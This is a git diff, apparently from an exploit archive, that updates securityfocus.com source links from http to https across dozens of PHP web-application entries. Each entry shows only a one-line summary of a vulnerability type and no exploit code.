--- a/exploits/php/webapps/29742.txt +++ b/exploits/php/webapps/29742.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22975/info +source: https://www.securityfocus.com/bid/22975/info Horde IMP Webmail Client is prone to multiple input-validation vulnerabilities, including cross-site scripting and an HTML-injection issue, because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29744.txt b/exploits/php/webapps/29744.txt index 761d32bb8..76b5f9646 100644 --- a/exploits/php/webapps/29744.txt +++ b/exploits/php/webapps/29744.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22979/info +source: https://www.securityfocus.com/bid/22979/info Viper Web Portal is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29745.txt b/exploits/php/webapps/29745.txt index 1103cd83e..a619a6e5b 100644 --- a/exploits/php/webapps/29745.txt +++ b/exploits/php/webapps/29745.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22984/info +source: https://www.securityfocus.com/bid/22984/info Horde Framework is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29747.txt b/exploits/php/webapps/29747.txt index 9e9f610a2..133185f91 100644 --- a/exploits/php/webapps/29747.txt +++ b/exploits/php/webapps/29747.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22996/info +source: https://www.securityfocus.com/bid/22996/info DirectAdmin is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29748.txt b/exploits/php/webapps/29748.txt index 5cbb5fefc..d8e565945 100644 --- a/exploits/php/webapps/29748.txt +++ b/exploits/php/webapps/29748.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22997/info +source: https://www.securityfocus.com/bid/22997/info Holtstraeter Rot 13 is prone to a directory-traversal vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29750.php b/exploits/php/webapps/29750.php index 33fb47efb..c1d07f9d9 100644 --- a/exploits/php/webapps/29750.php +++ b/exploits/php/webapps/29750.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23003/info +source: https://www.securityfocus.com/bid/23003/info Php-Stats is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/29751.php b/exploits/php/webapps/29751.php index 788db602a..474a1645d 100644 --- a/exploits/php/webapps/29751.php +++ b/exploits/php/webapps/29751.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23008/info +source: https://www.securityfocus.com/bid/23008/info PhpStats is prone to a remote code-execution vulnerability because the application fails to sanitize user-supplied input. diff --git a/exploits/php/webapps/29754.html b/exploits/php/webapps/29754.html index ac2c80908..6e564b71a 100644 --- a/exploits/php/webapps/29754.html +++ b/exploits/php/webapps/29754.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23027/info +source: https://www.securityfocus.com/bid/23027/info WordPress is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29755.html b/exploits/php/webapps/29755.html index b3e7c1331..6b165c549 100644 --- a/exploits/php/webapps/29755.html +++ b/exploits/php/webapps/29755.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23029/info +source: https://www.securityfocus.com/bid/23029/info Guesbara is prone to a vulnerability that may permit attackers to change the administrative password. diff --git a/exploits/php/webapps/29756.txt b/exploits/php/webapps/29756.txt index 8c65650c2..7a0224806 100644 --- a/exploits/php/webapps/29756.txt +++ b/exploits/php/webapps/29756.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23033/info +source: https://www.securityfocus.com/bid/23033/info PHPX is prone to multiple input-validation vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29757.txt b/exploits/php/webapps/29757.txt index daca22472..d8b48cba2 100644 --- a/exploits/php/webapps/29757.txt +++ b/exploits/php/webapps/29757.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23033/info +source: https://www.securityfocus.com/bid/23033/info PHPX is prone to multiple input-validation vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29758.txt b/exploits/php/webapps/29758.txt index 00b7e9946..08ed71910 100644 --- a/exploits/php/webapps/29758.txt +++ b/exploits/php/webapps/29758.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23033/info +source: https://www.securityfocus.com/bid/23033/info PHPX is prone to multiple input-validation vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29759.php b/exploits/php/webapps/29759.php index feb2024a4..2d487bbcc 100644 --- a/exploits/php/webapps/29759.php +++ b/exploits/php/webapps/29759.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23033/info +source: https://www.securityfocus.com/bid/23033/info PHPX is prone to multiple input-validation vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29760.txt b/exploits/php/webapps/29760.txt index fce025bbe..947ec4191 100644 --- a/exploits/php/webapps/29760.txt +++ b/exploits/php/webapps/29760.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23033/info +source: https://www.securityfocus.com/bid/23033/info PHPX is prone to multiple input-validation vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29762.txt b/exploits/php/webapps/29762.txt index 33cb0b670..5b75a63ed 100644 --- a/exploits/php/webapps/29762.txt +++ b/exploits/php/webapps/29762.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23051/info +source: https://www.securityfocus.com/bid/23051/info Web Wiz Forums is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/php/webapps/29763.php b/exploits/php/webapps/29763.php index bfb0c8437..0036ed47a 100644 --- a/exploits/php/webapps/29763.php +++ b/exploits/php/webapps/29763.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23055/info +source: https://www.securityfocus.com/bid/23055/info w-Agora is prone to multiple arbitrary file-upload vulnerabilities. diff --git a/exploits/php/webapps/29764.txt b/exploits/php/webapps/29764.txt index f53c61661..492034e1d 100644 --- a/exploits/php/webapps/29764.txt +++ b/exploits/php/webapps/29764.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23057/info +source: https://www.securityfocus.com/bid/23057/info w-Agora is prone to multiple input-validation vulnerabilities, including possible SQL-injection issues and multiple cross-site scripting issues, because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29765.txt b/exploits/php/webapps/29765.txt index 8f5dddde5..a6164c03a 100644 --- a/exploits/php/webapps/29765.txt +++ b/exploits/php/webapps/29765.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23057/info +source: https://www.securityfocus.com/bid/23057/info w-Agora is prone to multiple input-validation vulnerabilities, including possible SQL-injection issues and multiple cross-site scripting issues, because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29766.txt b/exploits/php/webapps/29766.txt index 73f9f7270..b39c14fe7 100644 --- a/exploits/php/webapps/29766.txt +++ b/exploits/php/webapps/29766.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23057/info +source: https://www.securityfocus.com/bid/23057/info w-Agora is prone to multiple input-validation vulnerabilities, including possible SQL-injection issues and multiple cross-site scripting issues, because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29772.txt b/exploits/php/webapps/29772.txt index 1b1586f8b..c3e9aa6a7 100644 --- a/exploits/php/webapps/29772.txt +++ b/exploits/php/webapps/29772.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23118/info +source: https://www.securityfocus.com/bid/23118/info Free File Hosting is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29773.txt b/exploits/php/webapps/29773.txt index fc19d9cb9..87dff3504 100644 --- a/exploits/php/webapps/29773.txt +++ b/exploits/php/webapps/29773.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23118/info +source: https://www.securityfocus.com/bid/23118/info Free File Hosting is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29774.txt b/exploits/php/webapps/29774.txt index bfa917f97..4f14c4bcb 100644 --- a/exploits/php/webapps/29774.txt +++ b/exploits/php/webapps/29774.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23118/info +source: https://www.securityfocus.com/bid/23118/info Free File Hosting is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29775.txt b/exploits/php/webapps/29775.txt index 04b7a0052..03f834cef 100644 --- a/exploits/php/webapps/29775.txt +++ b/exploits/php/webapps/29775.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23132/info +source: https://www.securityfocus.com/bid/23132/info Image_Upload Script is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29776.txt b/exploits/php/webapps/29776.txt index 954fb41ed..4a0a8c094 100644 --- a/exploits/php/webapps/29776.txt +++ b/exploits/php/webapps/29776.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23135/info +source: https://www.securityfocus.com/bid/23135/info CcCounter is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29780.txt b/exploits/php/webapps/29780.txt index c0c2c8acf..560820724 100644 --- a/exploits/php/webapps/29780.txt +++ b/exploits/php/webapps/29780.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23141/info +source: https://www.securityfocus.com/bid/23141/info Mephisto Blog is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29782.txt b/exploits/php/webapps/29782.txt index 7975e8345..73c71dac9 100644 --- a/exploits/php/webapps/29782.txt +++ b/exploits/php/webapps/29782.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23143/info +source: https://www.securityfocus.com/bid/23143/info Satel Lite is prone to a local file-include vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29783.txt b/exploits/php/webapps/29783.txt index 2a60ea7ed..c5cd109de 100644 --- a/exploits/php/webapps/29783.txt +++ b/exploits/php/webapps/29783.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23144/info +source: https://www.securityfocus.com/bid/23144/info Fizzle is prone to an HTML-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/php/webapps/29786.txt b/exploits/php/webapps/29786.txt index d94585d30..5f6133fc1 100644 --- a/exploits/php/webapps/29786.txt +++ b/exploits/php/webapps/29786.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23167/info +source: https://www.securityfocus.com/bid/23167/info aBitWhizzy is prone to multiple cross-site scripting and directory-traversal vulnerabilities because the application fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/29805.txt b/exploits/php/webapps/29805.txt index ee27aff61..c03e07968 100644 --- a/exploits/php/webapps/29805.txt +++ b/exploits/php/webapps/29805.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23215/info +source: https://www.securityfocus.com/bid/23215/info Drake CMS is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29806.pl b/exploits/php/webapps/29806.pl index 6fe8a9ab9..43002e229 100755 --- a/exploits/php/webapps/29806.pl +++ b/exploits/php/webapps/29806.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23225/info +source: https://www.securityfocus.com/bid/23225/info PHP-Fusion is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/php/webapps/29821.txt b/exploits/php/webapps/29821.txt index 896fabe37..9993b7cf8 100644 --- a/exploits/php/webapps/29821.txt +++ b/exploits/php/webapps/29821.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23353/info +source: https://www.securityfocus.com/bid/23353/info Livor is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29824.txt b/exploits/php/webapps/29824.txt index 7d70c657e..b6d428715 100644 --- a/exploits/php/webapps/29824.txt +++ b/exploits/php/webapps/29824.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23368/info +source: https://www.securityfocus.com/bid/23368/info QuizShock is prone to an HTML-injection scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29825.txt b/exploits/php/webapps/29825.txt index bf15a6c9c..d40256cdb 100644 --- a/exploits/php/webapps/29825.txt +++ b/exploits/php/webapps/29825.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23369/info +source: https://www.securityfocus.com/bid/23369/info UBB.threads is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/php/webapps/29827.pl b/exploits/php/webapps/29827.pl index 7d50dd96e..0308a7c3c 100755 --- a/exploits/php/webapps/29827.pl +++ b/exploits/php/webapps/29827.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23377/info +source: https://www.securityfocus.com/bid/23377/info eCardMAX HotEditor is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29828.html b/exploits/php/webapps/29828.html index f03085de7..95ddd2d83 100644 --- a/exploits/php/webapps/29828.html +++ b/exploits/php/webapps/29828.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23381/info +source: https://www.securityfocus.com/bid/23381/info DeskPRO is prone to an HTML-injection scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29829.txt b/exploits/php/webapps/29829.txt index 670da895a..d49a5a064 100644 --- a/exploits/php/webapps/29829.txt +++ b/exploits/php/webapps/29829.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23395/info +source: https://www.securityfocus.com/bid/23395/info Einfacher Passworschutz is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29830.txt b/exploits/php/webapps/29830.txt index 1d043f216..70ad13f17 100644 --- a/exploits/php/webapps/29830.txt +++ b/exploits/php/webapps/29830.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23398/info +source: https://www.securityfocus.com/bid/23398/info MyNews is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29831.txt b/exploits/php/webapps/29831.txt index 4f48dbaf8..597901f5f 100644 --- a/exploits/php/webapps/29831.txt +++ b/exploits/php/webapps/29831.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23400/info +source: https://www.securityfocus.com/bid/23400/info DropAFew is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/php/webapps/29832.txt b/exploits/php/webapps/29832.txt index 286bc5bd0..3bed00daa 100644 --- a/exploits/php/webapps/29832.txt +++ b/exploits/php/webapps/29832.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23400/info +source: https://www.securityfocus.com/bid/23400/info DropAFew is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/php/webapps/29833.txt b/exploits/php/webapps/29833.txt index ea7868e9b..fdfe834be 100644 --- a/exploits/php/webapps/29833.txt +++ b/exploits/php/webapps/29833.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23400/info +source: https://www.securityfocus.com/bid/23400/info DropAFew is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/php/webapps/29838.txt b/exploits/php/webapps/29838.txt index c9ce99752..91f1ef50e 100644 --- a/exploits/php/webapps/29838.txt +++ b/exploits/php/webapps/29838.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23411/info +source: https://www.securityfocus.com/bid/23411/info DotClear is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29839.txt b/exploits/php/webapps/29839.txt index db7b9ac70..776a229e6 100644 --- a/exploits/php/webapps/29839.txt +++ b/exploits/php/webapps/29839.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23411/info +source: https://www.securityfocus.com/bid/23411/info DotClear is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29841.txt b/exploits/php/webapps/29841.txt index 5ea11aa32..54c550d29 100644 --- a/exploits/php/webapps/29841.txt +++ b/exploits/php/webapps/29841.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23419/info +source: https://www.securityfocus.com/bid/23419/info TopSites is prone to a directory-traversal vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29845.txt b/exploits/php/webapps/29845.txt index 519135eba..8579c8847 100644 --- a/exploits/php/webapps/29845.txt +++ b/exploits/php/webapps/29845.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23448/info +source: https://www.securityfocus.com/bid/23448/info The 'phpwebnews' package is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29846.txt b/exploits/php/webapps/29846.txt index 1e0acf6fc..1a3ca2142 100644 --- a/exploits/php/webapps/29846.txt +++ b/exploits/php/webapps/29846.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23448/info +source: https://www.securityfocus.com/bid/23448/info The 'phpwebnews' package is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29847.txt b/exploits/php/webapps/29847.txt index 73925c653..8cd6090f2 100644 --- a/exploits/php/webapps/29847.txt +++ b/exploits/php/webapps/29847.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23448/info +source: https://www.securityfocus.com/bid/23448/info The 'phpwebnews' package is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29848.txt b/exploits/php/webapps/29848.txt index 0063ac4f5..a1c46b83d 100644 --- a/exploits/php/webapps/29848.txt +++ b/exploits/php/webapps/29848.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23452/info +source: https://www.securityfocus.com/bid/23452/info TuMusika Evolution is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29849.html b/exploits/php/webapps/29849.html index 22c714056..5e4b92b69 100644 --- a/exploits/php/webapps/29849.html +++ b/exploits/php/webapps/29849.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23453/info +source: https://www.securityfocus.com/bid/23453/info ToendaCMS is prone to an HTML-injection scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29851.txt b/exploits/php/webapps/29851.txt index 95b939f37..68ea5e4d7 100644 --- a/exploits/php/webapps/29851.txt +++ b/exploits/php/webapps/29851.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23481/info +source: https://www.securityfocus.com/bid/23481/info MailBee WebMail Pro is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29852.txt b/exploits/php/webapps/29852.txt index 34f0ca21f..e07f45732 100644 --- a/exploits/php/webapps/29852.txt +++ b/exploits/php/webapps/29852.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23482/info +source: https://www.securityfocus.com/bid/23482/info Doop Content Management System is prone to multiple input-validation vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29854.txt b/exploits/php/webapps/29854.txt index 270064a98..184f7de80 100644 --- a/exploits/php/webapps/29854.txt +++ b/exploits/php/webapps/29854.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23487/info +source: https://www.securityfocus.com/bid/23487/info BloofoxCMS is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29855.txt b/exploits/php/webapps/29855.txt index 16fbd6d21..ec32d43ba 100644 --- a/exploits/php/webapps/29855.txt +++ b/exploits/php/webapps/29855.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23488/info +source: https://www.securityfocus.com/bid/23488/info FloweRS is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29862.pl b/exploits/php/webapps/29862.pl index 228802502..35b0a0668 100755 --- a/exploits/php/webapps/29862.pl +++ b/exploits/php/webapps/29862.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23499/info +source: https://www.securityfocus.com/bid/23499/info News Manager Deluxe is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29863.txt b/exploits/php/webapps/29863.txt index 2d298f9e9..7fa594fdc 100644 --- a/exploits/php/webapps/29863.txt +++ b/exploits/php/webapps/29863.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23504/info +source: https://www.securityfocus.com/bid/23504/info Actionpoll is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/29864.php b/exploits/php/webapps/29864.php index 32696c52f..5f83e3063 100644 --- a/exploits/php/webapps/29864.php +++ b/exploits/php/webapps/29864.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23521/info +source: https://www.securityfocus.com/bid/23521/info MyBlog is prone to an authentication-bypass vulnerability. diff --git a/exploits/php/webapps/29865.txt b/exploits/php/webapps/29865.txt index 00a03c63c..db33116f0 100644 --- a/exploits/php/webapps/29865.txt +++ b/exploits/php/webapps/29865.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23526/info +source: https://www.securityfocus.com/bid/23526/info Wabbit Gallery Script is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29866.txt b/exploits/php/webapps/29866.txt index e1fb98818..1f3fe6df5 100644 --- a/exploits/php/webapps/29866.txt +++ b/exploits/php/webapps/29866.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23528/info +source: https://www.securityfocus.com/bid/23528/info PHP-Nuke is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/29868.txt b/exploits/php/webapps/29868.txt index b99295e0e..2277d7b55 100644 --- a/exploits/php/webapps/29868.txt +++ b/exploits/php/webapps/29868.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23555/info +source: https://www.securityfocus.com/bid/23555/info NuclearBB is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/php/webapps/29869.php b/exploits/php/webapps/29869.php index a4ec1eeea..6b93ecafe 100644 --- a/exploits/php/webapps/29869.php +++ b/exploits/php/webapps/29869.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23565/info +source: https://www.securityfocus.com/bid/23565/info Fully Modded PHPBB2 is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29870.txt b/exploits/php/webapps/29870.txt index b8357e7d5..bbea26cdc 100644 --- a/exploits/php/webapps/29870.txt +++ b/exploits/php/webapps/29870.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23574/info +source: https://www.securityfocus.com/bid/23574/info Exponent CMS is prone to multiple input-validation vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29871.txt b/exploits/php/webapps/29871.txt index 35695fc7f..c94f092df 100644 --- a/exploits/php/webapps/29871.txt +++ b/exploits/php/webapps/29871.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23574/info +source: https://www.securityfocus.com/bid/23574/info Exponent CMS is prone to multiple input-validation vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29872.txt b/exploits/php/webapps/29872.txt index 30b5d25c2..eeccd4ad3 100644 --- a/exploits/php/webapps/29872.txt +++ b/exploits/php/webapps/29872.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23574/info +source: https://www.securityfocus.com/bid/23574/info Exponent CMS is prone to multiple input-validation vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29874.txt b/exploits/php/webapps/29874.txt index 12438d896..fc6b1cdec 100644 --- a/exploits/php/webapps/29874.txt +++ b/exploits/php/webapps/29874.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23580/info +source: https://www.securityfocus.com/bid/23580/info PHP Turbulence is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29876.txt b/exploits/php/webapps/29876.txt index c37b95163..5d64b90a1 100644 --- a/exploits/php/webapps/29876.txt +++ b/exploits/php/webapps/29876.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23593/info +source: https://www.securityfocus.com/bid/23593/info TJSChat is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29877.html b/exploits/php/webapps/29877.html index 151395135..6ba7a245c 100644 --- a/exploits/php/webapps/29877.html +++ b/exploits/php/webapps/29877.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23597/info +source: https://www.securityfocus.com/bid/23597/info diff --git a/exploits/php/webapps/29878.txt b/exploits/php/webapps/29878.txt index f52ea9cd8..a119dc26f 100644 --- a/exploits/php/webapps/29878.txt +++ b/exploits/php/webapps/29878.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23598/info +source: https://www.securityfocus.com/bid/23598/info Allfaclassifieds is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29879.txt b/exploits/php/webapps/29879.txt index 99f69370f..b9b16eed9 100644 --- a/exploits/php/webapps/29879.txt +++ b/exploits/php/webapps/29879.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23599/info +source: https://www.securityfocus.com/bid/23599/info PHPMyBibli is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/29880.txt b/exploits/php/webapps/29880.txt index 1a9d7e25d..cfe96383b 100644 --- a/exploits/php/webapps/29880.txt +++ b/exploits/php/webapps/29880.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23600/info +source: https://www.securityfocus.com/bid/23600/info File117 is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29882.html b/exploits/php/webapps/29882.html index 9ce44f5e3..4c54a6a0f 100644 --- a/exploits/php/webapps/29882.html +++ b/exploits/php/webapps/29882.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23602/info +source: https://www.securityfocus.com/bid/23602/info phpMySpace Gold is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/php/webapps/29883.txt b/exploits/php/webapps/29883.txt index 48e412258..3072fcbe1 100644 --- a/exploits/php/webapps/29883.txt +++ b/exploits/php/webapps/29883.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23603/info +source: https://www.securityfocus.com/bid/23603/info acvsws_php5 is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29885.txt b/exploits/php/webapps/29885.txt index 5b009f64c..61e9da3b3 100644 --- a/exploits/php/webapps/29885.txt +++ b/exploits/php/webapps/29885.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23609/info +source: https://www.securityfocus.com/bid/23609/info Claroline is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29886.txt b/exploits/php/webapps/29886.txt index fe6e42b12..b9ceb9c89 100644 --- a/exploits/php/webapps/29886.txt +++ b/exploits/php/webapps/29886.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23611/info +source: https://www.securityfocus.com/bid/23611/info LMS is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/29887.txt b/exploits/php/webapps/29887.txt index 84eacc73c..a73700545 100644 --- a/exploits/php/webapps/29887.txt +++ b/exploits/php/webapps/29887.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23616/info +source: https://www.securityfocus.com/bid/23616/info Phorum is prone to multiple input-validation vulnerabilities, including an unauthorized-access issue, privilege-escalation issue, multiple SQL-injection issues, and cross-site scripting issues, because the application fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/29888.txt b/exploits/php/webapps/29888.txt index 16b8baa94..ce45800f4 100644 --- a/exploits/php/webapps/29888.txt +++ b/exploits/php/webapps/29888.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23616/info +source: https://www.securityfocus.com/bid/23616/info Phorum is prone to multiple input-validation vulnerabilities, including an unauthorized-access issue, privilege-escalation issue, multiple SQL-injection issues, and cross-site scripting issues, because the application fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/29889.txt b/exploits/php/webapps/29889.txt index 9592fff51..ba225a917 100644 --- a/exploits/php/webapps/29889.txt +++ b/exploits/php/webapps/29889.txt @@ -1,4 